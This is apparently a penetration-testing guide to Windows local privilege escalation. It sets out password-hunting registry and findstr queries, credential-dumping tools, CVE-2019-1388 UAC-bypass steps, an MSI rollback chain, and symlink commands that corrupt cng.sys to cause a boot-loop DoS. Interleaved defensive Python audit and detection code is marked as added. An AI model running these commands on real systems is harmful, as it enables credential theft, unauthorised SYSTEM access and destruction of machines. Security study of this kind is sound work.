To recover passwords saved by several programs you can use: http://www.nirsoft.net/password_recovery_tools.html
Inside the registry
Other possible registry keys with credentials
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"
Extract openssh keys from registry.
Browsers History
You should check for dbs where passwords from Chrome or Firefox are stored.
Also check the history, bookmarks and favourites of the browsers, since some passwords may be stored there.
Tools to extract passwords from browsers:
- Mimikatz: dpapi::chrome
- SharpWeb
- SharpChromium
- SharpDPAPI
COM DLL Overwriting
Component Object Model (COM) is a technology built into the Windows operating system that allows intercommunication between software components written in different languages. Each COM component is identified via a class ID (CLSID) and each component exposes functionality via one or more interfaces, identified via interface IDs (IIDs).
COM classes and interfaces are defined in the registry under HKEY_CLASSES_ROOT\CLSID and HKEY_CLASSES_ROOT\Interface respectively. This registry view is created by merging HKEY_LOCAL_MACHINE\Software\Classes + HKEY_CURRENT_USER\Software\Classes = HKEY_CLASSES_ROOT.
Inside the CLSIDs of this registry you can find the child key InProcServer32, which contains a default value pointing to a DLL and a value called ThreadingModel that can be Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) or Neutral (Thread Neutral).
Basically, if you can overwrite any of the DLLs that are going to be executed, you could escalate privileges if that DLL is going to be executed by a different user.
To learn how attackers use COM Hijacking as a persistence mechanism check:
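The following Python is an added example, not code from the original page or from any project. It parses a .reg export of the CLSID tree (as produced by regedit or reg export), including hex(2) REG_EXPAND_SZ values with line continuations, extracts each InProcServer32 DLL path and ThreadingModel, and flags the registrations a defender should review first: per-user entries under HKCU\Software\Classes (which win the HKCR merge described above), DLL paths outside protected directories, and bare DLL names resolved through the search order. The .reg text and CLSIDs below are constructed.

```python
"""Audit COM InProcServer32 registrations from a .reg export.

Added example, not code from the original page. The .reg text is constructed.
"""
import re
from dataclasses import dataclass, field

# Where a DLL that only Administrators can replace is expected to live.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
ENV = {"%systemroot%": r"C:\Windows", "%windir%": r"C:\Windows",
       "%programfiles%": r"C:\Program Files", "%commonprogramfiles%": r"C:\Program Files\Common Files"}
KEY_RE = re.compile(r"^(HKEY_[A-Z_]+)\\(?:Software\\Classes\\)?CLSID\\(\{[^}]+\})\\InProcServer32$", re.I)


@dataclass
class InProcServer:
    hive: str
    clsid: str
    dll: str = ""
    threading_model: str = None
    findings: list = field(default_factory=list)


def _decode_value(raw):
    """Decode a .reg value: "quoted string" or hex(1)/hex(2) UTF-16LE bytes."""
    raw = raw.strip()
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    m = re.match(r"hex\((1|2)\):(.*)", raw, re.S)
    if m:
        data = bytes(int(b, 16) for b in re.findall(r"[0-9a-fA-F]{2}", m.group(2)))
        return data.decode("utf-16-le").rstrip("\x00")
    return raw


def parse_reg(text):
    """Return the InProcServer32 entries found in .reg export text."""
    text = re.sub(r"\\\r?\n[ \t]*", "", text)  # join hex continuation lines
    servers, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            m = KEY_RE.match(line[1:-1])
            current = InProcServer(m.group(1).upper(), m.group(2).upper()) if m else None
            if current:
                servers.append(current)
        elif current is not None and "=" in line:
            name, _, value = line.partition("=")
            if name == "@":
                current.dll = _decode_value(value)
            elif name.strip('"').lower() == "threadingmodel":
                current.threading_model = _decode_value(value)
    return servers


def _expand(path):
    return re.sub(r"%[^%]+%", lambda m: ENV.get(m.group(0).lower(), m.group(0)), path)


def audit(servers):
    """Attach review findings to each registration and return the list."""
    for s in servers:
        path = _expand(s.dll).strip().strip('"').lower()
        if s.hive == "HKEY_CURRENT_USER":
            s.findings.append("per-user override: HKCU\\Software\\Classes takes precedence in the "
                              "HKCR merge and is writable by the user")
        if not re.match(r"^[a-z]:\\", path):
            s.findings.append("relative DLL name: resolved through the DLL search order")
        elif not path.startswith(TRUSTED_PREFIXES):
            s.findings.append("DLL outside protected system directories: review the file and folder DACLs")
    return servers


# Constructed export: a system class, a vendor class, a per-user override of the
# vendor class pointing into %TEMP%, and a legacy class with a bare DLL name.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{AAAAAAAA-0000-0000-0000-000000000001}\InProcServer32]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,\
  5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,6f,00,6c,00,65,00,\
  33,00,32,00,2e,00,64,00,6c,00,6c,00,00,00
"ThreadingModel"="Both"

[HKEY_CLASSES_ROOT\CLSID\{AAAAAAAA-0000-0000-0000-000000000002}\InProcServer32]
@="C:\\Program Files\\ExampleVendor\\vendor.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{AAAAAAAA-0000-0000-0000-000000000002}\InProcServer32]
@="C:\\Users\\alice\\AppData\\Local\\Temp\\vendor.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{AAAAAAAA-0000-0000-0000-000000000003}\InProcServer32]
@="legacy.dll"
"""

if __name__ == "__main__":
    for s in audit(parse_reg(SAMPLE_REG)):
        print(f"{s.hive} {s.clsid} -> {s.dll} [{s.threading_model}] {'; '.join(s.findings) or 'ok'}")
```

On a live host, export with reg export HKCR\CLSID clsid.reg (and the HKCU\Software\Classes\CLSID tree) and feed the files to parse_reg; every flagged path is then checked for a missing file or a DACL that lets a standard user write it.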
Generic Password search in files and registry
Search for file contents
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
Search for a file with a certain filename
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
Search the registry for key names and passwords
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d
Tools that search for passwords
MSF-Credentials Plugin is a msf plugin I created to automatically execute every metasploit POST module that searches for credentials inside the victim.
Winpeas automatically searches for all the files containing passwords mentioned in this page.
Lazagne is another great tool for extracting passwords from a system.
The tool SessionGopher searches for sessions, usernames and passwords of several tools that save this data in clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
Leaked Handlers
Imagine that a process running as SYSTEM opens a new process (OpenProcess()) with full access. The same process also creates a new process (CreateProcess()) with low privileges but inheriting all the open handles of the main process.
Then, if you have full access to the low privileged process, you can grab the open handle to the privileged process created with OpenProcess() and inject a shellcode.
Read this example for more information about how to detect and exploit this vulnerability.
Read this other post for a more complete explanation on how to test and abuse more open handles of processes and threads inherited with different levels of permissions (not only full access).
Named Pipe Client Impersonation
Shared memory segments, referred to as pipes, enable process communication and data transfer.
Windows provides a feature called Named Pipes, allowing unrelated processes to share data, even over different networks. This resembles a client/server architecture, with roles defined as named pipe server and named pipe client.
When data is sent through a pipe by a client, the server that set up the pipe has the ability to take on the identity of the client, provided it holds the SeImpersonate right. Identifying a privileged process that communicates via a pipe you can mimic provides an opportunity to gain higher privileges by adopting that process's identity once it interacts with the pipe you established. For instructions on executing such an attack, helpful guides can be found here and here.
Also the following tool allows you to intercept a named pipe communication with a tool like burp: https://github.com/gabriel-sztejnworcel/pipe-intercept and this tool allows you to list and see all the pipes to find privescs https://github.com/cyberark/PipeViewer
Telephony tapsrv remote DWORD write to RCE
The Telephony service (TapiSrv) in server mode exposes \\pipe\\tapsrv (MS-TRP). A remote authenticated client can abuse the mailslot-based asynchronous event path to turn ClientAttach into an arbitrary 4-byte write to any existing file writable by NETWORK SERVICE, then obtain Telephony admin rights and load any DLL as the service. Full chain:
- ClientAttach with pszDomainUser set to an existing writable path → the service opens it via CreateFileW(..., OPEN_EXISTING) and uses it for async event writes.
- Each event writes the attacker-controlled InitContext from Initialize to that handle. Register a line app with LRegisterRequestRecipient (Req_Func 61), trigger TRequestMakeCall (Req_Func 121), collect via GetAsyncEvents (Req_Func 0), then unregister/shutdown to repeat the deterministic write.
- Add yourself to [TapiAdministrators] in C:\Windows\TAPI\tsec.ini, reconnect, then call GetUIDllName with any DLL path to execute TSPI_providerUIIdentify as NETWORK SERVICE.
More details:
Telephony Tapsrv Arbitrary Dword Write To Rce
Others
File Extensions that could execute stuff in Windows
Check the page https://filesec.io/
Protocol handler / ShellExecute abuse via Markdown renderers
Clickable Markdown links passed to ShellExecuteExW can launch dangerous URI handlers (file:, ms-appinstaller: or any registered scheme) and run attacker-controlled files as the current user. See:
Protocol Handler Shell Execute Abuse
Monitoring Command Lines for passwords
When getting a shell as a user, there may be scheduled tasks or other processes being executed which pass credentials on the command line. The script below captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.
while($true)
{
    $process = Get-WmiObject Win32_Process | Select-Object CommandLine
    Start-Sleep 1
    $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
    Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
Stealing passwords from processes
From Low Priv User to NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass
If you have access to the graphical interface (via console or RDP) and UAC is enabled, in some versions of Microsoft Windows it is possible to run a terminal or any other process as "NT\AUTHORITY SYSTEM" from an unprivileged user.
This makes it possible to escalate privileges and bypass UAC at the same time with the same vulnerability. Additionally, there is no need to install anything, and the binary used during the process is signed and issued by Microsoft.
Some of the affected systems are the following:
SERVER
======
Windows 2008r2 7601 ** link OPENED AS SYSTEM **
Windows 2012r2 9600 ** link OPENED AS SYSTEM **
Windows 2016 14393 ** link OPENED AS SYSTEM **
Windows 2019 17763 link NOT opened
WORKSTATION
===========
Windows 7 SP1 7601 ** link OPENED AS SYSTEM **
Windows 8 9200 ** link OPENED AS SYSTEM **
Windows 8.1 9600 ** link OPENED AS SYSTEM **
Windows 10 1511 10240 ** link OPENED AS SYSTEM **
Windows 10 1607 14393 ** link OPENED AS SYSTEM **
Windows 10 1703 15063 link NOT opened
Windows 10 1709 16299 link NOT opened
To exploit this vulnerability, it is necessary to perform the following steps:
1) Right click on the HHUPD.EXE file and run it as Administrator.
2) When the UAC prompt appears, select "Show more details".
3) Click "Show publisher certificate information".
4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.
5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.
6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.
7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.
8) Remember to cancel setup and the UAC prompt to return to your desktop.
You have all the necessary files and information in the following GitHub repository:
https://github.com/jas502n/CVE-2019-1388
From Administrator Medium to High Integrity Level / UAC Bypass
Read this to learn about Integrity Levels:
Then read this to learn about UAC and UAC bypasses:
From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP
The technique is described in this blog post, with exploit code available here.
The attack basically consists of abusing the Windows Installer's rollback feature to replace legitimate files with malicious ones during the uninstallation process. For this the attacker needs to create a malicious MSI installer that will be used to hijack the C:\Config.Msi folder, which is later used by the Windows Installer to store rollback files during the uninstallation of other MSI packages, where the rollback files would have been modified to contain the malicious payload.
The summarized technique is the following:
- Stage 1 – Preparing for the Hijack (leave C:\Config.Msi empty)
  - Step 1: Install the MSI
    - Create an .msi that installs a harmless file (e.g., dummy.txt) in a writable folder (TARGETDIR).
    - Mark the installer as "UAC Compliant", so a non-admin user can run it.
    - Keep a handle open to the file after install.
  - Step 2: Begin Uninstall
    - Uninstall the same .msi.
    - The uninstall process starts moving files to C:\Config.Msi and renaming them to .rbf files (rollback backups).
    - Poll the open file handle using GetFinalPathNameByHandle to detect when the file becomes C:\Config.Msi\<random>.rbf.
  - Step 3: Custom Syncing
    - The .msi includes a custom uninstall action (SyncOnRbfWritten) that:
      - Signals when the .rbf has been written.
      - Then waits on another event before continuing the uninstall.
  - Step 4: Block Deletion of .rbf
    - When signaled, open the .rbf file without FILE_SHARE_DELETE; this prevents it from being deleted.
    - Then signal back so the uninstall can finish.
    - Windows Installer fails to delete the .rbf, and because it can't delete all contents, C:\Config.Msi is not removed.
  - Step 5: Manually Delete .rbf
    - You (attacker) delete the .rbf file manually.
    - Now C:\Config.Msi is empty, ready to be hijacked.
  At this point, trigger the SYSTEM-level arbitrary folder delete vulnerability to delete C:\Config.Msi.
- Stage 2 – Replacing Rollback Scripts with Malicious Ones
  - Step 6: Recreate C:\Config.Msi with Weak ACLs
    - Recreate the C:\Config.Msi folder yourself.
    - Set weak DACLs (e.g., Everyone:F), and keep a handle open with WRITE_DAC.
  - Step 7: Run Another Install
    - Install the .msi again, with:
      - TARGETDIR: Writable location.
      - ERROROUT: A variable that triggers a forced failure.
    - This install will be used to trigger rollback again, which reads .rbs and .rbf.
  - Step 8: Monitor for .rbs
    - Use ReadDirectoryChangesW to monitor C:\Config.Msi until a new .rbs appears.
    - Capture its filename.
  - Step 9: Sync Before Rollback
    - The .msi contains a custom install action (SyncBeforeRollback) that:
      - Signals an event when the .rbs is created.
      - Then waits before continuing.
  - Step 10: Reapply Weak ACL
    - After receiving the ".rbs created" event:
      - The Windows Installer reapplies strong ACLs to C:\Config.Msi.
      - But since you still have a handle with WRITE_DAC, you can reapply weak ACLs again.
    - ACLs are only enforced on handle open, so you can still write to the folder.
  - Step 11: Drop Fake .rbs and .rbf
    - Overwrite the .rbs file with a fake rollback script that tells Windows to:
      - Restore your .rbf file (malicious DLL) into a privileged location (e.g., C:\Program Files\Common Files\microsoft shared\ink\HID.DLL).
    - Drop your fake .rbf containing a malicious SYSTEM-level payload DLL.
  - Step 12: Trigger the Rollback
    - Signal the sync event so the installer resumes.
    - A type 19 custom action (ErrorOut) is configured to intentionally fail the install at a known point.
    - This causes rollback to begin.
  - Step 13: SYSTEM Installs Your DLL
    - Windows Installer:
      - Reads your malicious .rbs.
      - Copies your .rbf DLL into the target location.
    - You now have your malicious DLL in a SYSTEM-loaded path.
  - Final Step: Execute SYSTEM Code
    - Run a trusted auto-elevated binary (e.g., osk.exe) that loads the DLL you hijacked.
    - Boom: Your code is executed as SYSTEM.
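Defensive check for the precondition abused in Step 6, added here as an example and not part of the original page or the referenced exploit: parse the output of `icacls C:\Config.Msi` and flag ACEs that hand a broad principal write-class rights on the rollback folder. The sample output, the principal list and the rights threshold are constructed assumptions.

```python
import re

# Added example (not from the page): parse `icacls C:\Config.Msi` output and flag ACEs that
# would let a standard user hijack the rollback folder (the precondition abused in Step 6).
# Assumed threshold: any broad principal holding a write-class right is a finding.

WEAK_PRINCIPALS = ("everyone", "builtin\\users", "nt authority\\authenticated users",
                   "nt authority\\interactive")
WRITE_RIGHTS = {"F", "M", "W", "GW", "GA", "WD", "AD", "WDAC", "WO"}
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}

# Constructed sample output: an Everyone:(F) ACE like the one set in Step 6.
CONSTRUCTED_ICACLS = """\
C:\\Config.Msi Everyone:(OI)(CI)(F)
              NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
              BUILTIN\\Administrators:(OI)(CI)(F)
              BUILTIN\\Users:(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

def parse_icacls(text: str, path: str) -> list:
    """Return (principal, rights) pairs; the queried path is stripped from the first line."""
    aces = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        if ":(" not in line:          # not an ACE line (blank line or summary text)
            continue
        principal, flags = line.rsplit(":(", 1)
        perms = re.findall(r"\(([^)]*)\)", "(" + flags)
        rights = {r for p in perms for r in p.split(",")} - INHERIT_FLAGS
        aces.append((principal, rights))
    return aces

def weak_aces(text: str, path: str) -> list:
    """ACEs granting write-class rights to broad principals: the hijack precondition."""
    return [(p, r) for p, r in parse_icacls(text, path)
            if p.lower() in WEAK_PRINCIPALS and r & WRITE_RIGHTS]
```

A healthy C:\Config.Msi yields no entries from weak_aces; any hit means a standard user can stage rollback files there.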
From Arbitrary File Delete/Move/Rename to SYSTEM EoP
The main MSI rollback technique (the previous one) assumes you can delete an entire folder (e.g., C:\Config.Msi). But what if your vulnerability only allows arbitrary file deletion?
You could exploit NTFS internals: every folder has a hidden alternate data stream called:
C:\SomeFolder::$INDEX_ALLOCATION
This stream stores the folder's index metadata.
So, if you delete the ::$INDEX_ALLOCATION stream of a folder, NTFS removes the entire folder from the file system.
You can do this using standard file deletion APIs such as:
DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");
Even though you are calling a file delete API, it deletes the folder itself.
From Folder Contents Delete to SYSTEM EoP
What if your primitive doesn't let you delete arbitrary files/folders, but does allow deletion of the contents of an attacker-controlled folder?
- Step 1: Prepare a bait folder and file
  - Create: C:\temp\folder1
  - Inside it: C:\temp\folder1\file1.txt
- Step 2: Place an oplock on file1.txt
  - The oplock pauses execution when a privileged process tries to delete file1.txt.
// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();
- Step 3: Trigger a SYSTEM process (e.g., SilentCleanup)
  - This process walks folders (e.g., %TEMP%) and tries to delete their contents.
  - When it reaches file1.txt, the oplock fires and hands control to your callback.
- Step 4: Inside the oplock callback – redirect the deletion
  - Option A: Move file1.txt elsewhere
    - This makes folder1 empty without breaking the oplock.
    - Do not delete file1.txt directly; that would release the oplock early.
  - Option B: Turn folder1 into a junction:
# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control
  - Option C: Create a symlink in \RPC Control:
# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")
This targets the internal NTFS stream that stores the folder's metadata; deleting it causes the folder to be deleted.
- Step 5: Release the oplock
  - The SYSTEM process continues and tries to delete file1.txt.
  - But now, because of the junction + symlink, it actually deletes:
C:\Config.Msi::$INDEX_ALLOCATION
Result: C:\Config.Msi is deleted by SYSTEM.
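The defensive counterpart to the two primitives above (stream deletion and redirected folder-contents deletion), added here as an example and not code from the original page: a "clear folder contents" routine that a privileged cleanup task should use. It refuses NTFS stream syntax such as ::$INDEX_ALLOCATION, never follows symlinks or junctions (so a swapped-in junction or OM symlink cannot redirect the delete), and only removes directories it fully emptied. The temp layout in demo() is constructed; SilentCleanup is named only as the page's example of such a task.

```python
import os
import tempfile
from pathlib import Path

# Added example (not from the page): hardened "clear folder contents" routine for a privileged
# cleanup task. Never follows reparse points and never acts on NTFS stream syntax.

def is_stream_syntax(name: str) -> bool:
    """True for 'Config.Msi::$INDEX_ALLOCATION' or 'file:stream' (NTFS stream addressing)."""
    return ":" in name

def is_reparse_point(entry: os.DirEntry) -> bool:
    """Symlink on any OS; also a junction on Windows (DirEntry.is_junction, Python 3.12+)."""
    return entry.is_symlink() or getattr(entry, "is_junction", lambda: False)()

def safe_clear_folder(root: str) -> dict:
    """Delete the contents of root without following links; report what was removed/skipped."""
    report = {"removed": [], "skipped": []}
    root_path = Path(root)
    # Refuse stream syntax, and a root that is itself a reparse point (junction swapped in).
    if is_stream_syntax(root_path.name) or root_path.is_symlink():
        report["skipped"].append(root)
        return report
    for entry in os.scandir(root):
        if is_stream_syntax(entry.name) or is_reparse_point(entry):
            report["skipped"].append(entry.path)  # leave the link alone; never touch its target
            continue
        if entry.is_dir(follow_symlinks=False):
            sub = safe_clear_folder(entry.path)
            report["removed"] += sub["removed"]
            report["skipped"] += sub["skipped"]
            if not sub["skipped"]:  # only remove a directory we actually emptied
                os.rmdir(entry.path)
                report["removed"].append(entry.path)
        else:
            os.unlink(entry.path)
            report["removed"].append(entry.path)
    return report

def demo() -> dict:
    """Constructed layout: bait folder with a real file plus a link to a folder outside it."""
    base = Path(tempfile.mkdtemp())
    (base / "Config.Msi").mkdir()
    (base / "Config.Msi" / "keep.rbf").write_text("must survive")
    (base / "folder1").mkdir()
    (base / "folder1" / "file1.txt").write_text("junk")
    (base / "folder1" / "link_out").symlink_to(base / "Config.Msi", target_is_directory=True)
    report = safe_clear_folder(str(base / "folder1"))
    report["outside_intact"] = (base / "Config.Msi" / "keep.rbf").exists()
    return report
```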
From Arbitrary Folder Create to Permanent DoS
Use a primitive that lets you create an arbitrary folder as SYSTEM/admin, even if you cannot write files or set weak permissions.
Create a folder (not a file) with the name of a critical Windows driver, for example:
C:\Windows\System32\cng.sys
- This path normally corresponds to the kernel-mode driver cng.sys.
- If you pre-create it as a folder, Windows fails to load the real driver at boot.
- Then, Windows tries to load cng.sys during boot.
- When it sees the folder, it fails to resolve the real driver and crashes or halts the boot.
- There is no fallback, and no recovery without external intervention (e.g., boot repair or disk access).
From privileged log/backup paths + OM symlinks to arbitrary file overwrite / boot DoS
When a privileged service writes logs/exports to a path read from an attacker-writable config, try redirecting that path with Object Manager symlinks + NTFS mount points to turn the privileged service's write into an arbitrary file overwrite (even without SeCreateSymbolicLinkPrivilege).
Requirements
- The config that stores the target path is writable by the attacker (e.g., %ProgramData%\...\.ini).
- Ability to create a mount point to \RPC Control and an OM file symlink (James Forshaw's symboliclink-testing-tools).
- A privileged operation that writes to that path (log, export, report).
Example chain
- Read the config to find the privileged log location, e.g. SMSLogFile=C:\users\iconics_user\AppData\Local\Temp\logs\log.txt in C:\ProgramData\ICONICS\IcoSetup64.ini.
- Redirect the path without admin:
mkdir C:\users\iconics_user\AppData\Local\Temp\logs
CreateMountPoint C:\users\iconics_user\AppData\Local\Temp\logs \RPC Control
CreateSymlink "\\RPC Control\\log.txt" "\\??\\C:\\Windows\\System32\\cng.sys"
- Wait for the high-privilege component to write the log (e.g., an admin triggers "send test SMS"). The write now lands in C:\Windows\System32\cng.sys.
- Inspect the modified target (hex/PE parser) to confirm corruption; a reboot forces Windows to load the modified driver path → boot loop DoS. This also applies to any protected file the privileged service will open for writing.
cng.sys is normally loaded from C:\Windows\System32\drivers\cng.sys, but if a copy exists in C:\Windows\System32\cng.sys it may be tried first, making it a reliable DoS sink for corrupted data.
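Audit logic for the two conditions just described, added here as an example and not part of the original page or the referenced research: flag a cng.sys folder or stray copy directly in System32 (the legitimate driver lives in System32\drivers), and flag config log targets that sit in user-writable locations and could be turned into a mount point. The .ini text, the System32 layout built in demo() and the user-writable prefix list are constructed assumptions.

```python
import configparser
import tempfile
from pathlib import Path, PureWindowsPath

# Added example (not from the page): audit for the two conditions above. Assumed: the only
# legitimate cng.sys lives in System32\drivers, and a log target under a user-writable
# location is redirectable via a mount point.

USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\temp\\")

# Constructed .ini in the style of the IcoSetup64.ini example above.
CONSTRUCTED_INI = """\
[Setup]
SMSLogFile=C:\\users\\iconics_user\\AppData\\Local\\Temp\\logs\\log.txt
ExportLog=C:\\ProgramData\\ICONICS\\export.log
ServiceLog=C:\\Windows\\System32\\LogFiles\\svc.log
"""

def check_driver_shadow(system32: str, driver: str = "cng.sys") -> list:
    """Flag a file or folder carrying a driver name directly in System32 (not in drivers\\)."""
    shadow = Path(system32, driver)
    if shadow.is_dir():
        return [f"{shadow}: folder squatting on driver name (boot DoS primitive)"]
    if shadow.exists():
        return [f"{shadow}: driver copy outside drivers\\ (overwrite sink, may load first)"]
    return []

def check_log_paths(ini_text: str) -> list:
    """Flag keys containing 'log' whose target lies in a user-writable location."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.optionxform = str                       # keep key case (SMSLogFile)
    cfg.read_string(ini_text)
    findings = []
    for section in cfg.sections():
        for key, value in cfg.items(section):
            target = str(PureWindowsPath(value)).lower()
            if "log" in key.lower() and target.startswith(USER_WRITABLE_PREFIXES):
                findings.append(f"[{section}] {key}={value}: user-writable log target")
    return findings

def demo() -> dict:
    """Constructed layout: legit driver under drivers\\ plus a squatting folder one level up."""
    sys32 = Path(tempfile.mkdtemp(), "System32")
    (sys32 / "drivers").mkdir(parents=True)
    (sys32 / "drivers" / "cng.sys").write_bytes(b"MZ constructed")
    (sys32 / "cng.sys").mkdir()                 # the folder that breaks boot
    return {"driver": check_driver_shadow(str(sys32)), "logs": check_log_paths(CONSTRUCTED_INI)}
```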
From High Integrity to SYSTEM
New service
If you are already running in a High Integrity process, the path to SYSTEM can be as easy as creating and running a new service:
sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename
Tip
When creating a service binary make sure it is a valid service or that the binary performs the required actions quickly, as it will be killed within 20 seconds if it is not a valid service.
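Detection for the service-creation step above, added here as an example and not part of the original page: it scans System log 7045 ("a service was installed") records and flags services whose image is a non-service binary such as notepad.exe, or lives outside trusted roots, especially when the account is LocalSystem. The pipe-separated line format, the sample records and the trusted-root and binary lists are constructed assumptions, not a Windows export format.

```python
import re
from typing import Optional
from pathlib import PureWindowsPath

# Added example (not from the page): detection for the "sc create" step above, run over a
# constructed export of System log 7045 (service installed) records. The line format is a
# constructed simplification, not a Windows export format:
#   7045|<ServiceName>|<ServiceFileName>|<StartType>|<Account>

TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
NON_SERVICE_BINARIES = {"notepad.exe", "cmd.exe", "powershell.exe", "rundll32.exe"}

SAMPLE_LOG = """\
7045|newservicename|C:\\windows\\system32\\notepad.exe|demand start|LocalSystem
7045|Dnscache|C:\\Windows\\system32\\svchost.exe -k NetworkService|auto start|NT AUTHORITY\\NetworkService
7045|updater|C:\\Users\\bob\\AppData\\Local\\Temp\\svc.exe|demand start|LocalSystem
"""

def image_from_command(cmd: str) -> str:
    """Strip quotes and arguments from a ServiceFileName so only the executable path remains."""
    m = re.match(r'"([^"]+)"|(\S+)', cmd.strip())
    return (m.group(1) or m.group(2)) if m else cmd.strip()

def classify(line: str) -> Optional[dict]:
    """Return a finding for a suspicious 7045 record, else None."""
    parts = line.rstrip("\n").split("|")
    if len(parts) != 5 or parts[0] != "7045":
        return None
    _, name, cmd, _start, account = parts
    image = PureWindowsPath(image_from_command(cmd))
    reasons = []
    if image.name.lower() in NON_SERVICE_BINARIES:
        reasons.append("non-service binary used as ServiceFileName")
    if not str(image).lower().startswith(TRUSTED_ROOTS):
        reasons.append("image outside trusted roots (likely user-writable)")
    if reasons and account.lower() in ("localsystem", "nt authority\\system"):
        reasons.append("runs as SYSTEM")
    return {"service": name, "image": str(image), "reasons": reasons} if reasons else None

def scan(log_text: str) -> list:
    """Apply classify() to every exported line and return the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]
```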
AlwaysInstallElevated
From a High Integrity process you can try to enable the AlwaysInstallElevated registry entries and install a reverse shell using an .msi wrapper.
More information about the registry keys involved and how to install a .msi package here.
High + SeImpersonate privilege to System
You can find the code here.
From SeDebug + SeImpersonate to Full Token privileges
If you have those token privileges (you will probably find them in an already High Integrity process), you will be able to open almost any process (non-protected processes) using the SeDebug privilege, copy the token of the process, and create an arbitrary process with that token.
This technique usually involves selecting a process running as SYSTEM with all the token privileges (yes, you can find SYSTEM processes without all the token privileges).
You can find an example of code executing the proposed technique here.
Named Pipes
This technique is used by meterpreter to escalate in getsystem. The technique consists of creating a pipe and then creating/abusing a service to write to that pipe. Then, the server that created the pipe using the SeImpersonate privilege will be able to impersonate the token of the pipe client (the service) and obtain SYSTEM privileges.
If you want to learn more about named pipes you should read this.
If you want to read an example of how to go from high integrity to System using named pipes you should read this.
Dll Hijacking
If you manage to hijack a dll being loaded by a process running as SYSTEM, you will be able to execute arbitrary code with those permissions. Therefore Dll Hijacking is also useful for this kind of privilege escalation and, moreover, it is far easier to achieve from a high integrity process as it will have write permissions on the folders used to load dlls.
You can learn more about Dll hijacking here.
From Administrator or Network Service to System
- https://github.com/sailay1996/RpcSsImpersonator
- https://decoder.cloud/2020/05/04/from-network-service-to-system/
- https://github.com/decoder-it/NetworkServiceExploit
From LOCAL SERVICE or NETWORK SERVICE to full privs
Read: https://github.com/itm4n/FullPowers
More help
Useful tools
Best tool to look for Windows local privilege escalation vectors: WinPEAS
PS
PrivescCheck
PowerSploit-Privesc(PowerUP) – Checks for misconfigurations and sensitive files (check here). Detected.
JAWS – Checks for some possible misconfigurations and gathers info (check here).
privesc – Checks for misconfigurations
SessionGopher – Extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information. Use -Thorough locally.
Invoke-WCMDump – Extracts credentials from Credential Manager. Detected.
DomainPasswordSpray – Sprays the gathered passwords across the domain
Inveigh – Inveigh is a PowerShell ADIDNS/LLMNR/mDNS spoofer and man-in-the-middle tool.
WindowsEnum – Basic privesc enumeration
Sherlock – Searches for known privesc vulnerabilities (DEPRECATED in favour of Watson)
WINspect – Local checks (Needs Admin rights)
Exe
Watson – Searches for known privesc vulnerabilities (needs to be compiled using VisualStudio) (precompiled)
SeatBelt – Enumerates the host searching for misconfigurations (more an info-gathering tool than privesc) (needs to be compiled) (precompiled)
LaZagne – Extracts credentials from lots of software (precompiled exe in github)
SharpUP – Port of PowerUp to C#
Beroot – Checks for misconfiguration (executable precompiled in github). Not recommended. It doesn't work well in Win10.
Windows-Privesc-Check – Checks for possible misconfigurations (exe from python). Not recommended. It doesn't work well in Win10.
Bat
winPEASbat – Tool created based on this post (it does not need accesschk to work properly but it can use it).
Local
Windows-Exploit-Suggester – Reads the output of systeminfo and recommends working exploits (local python)
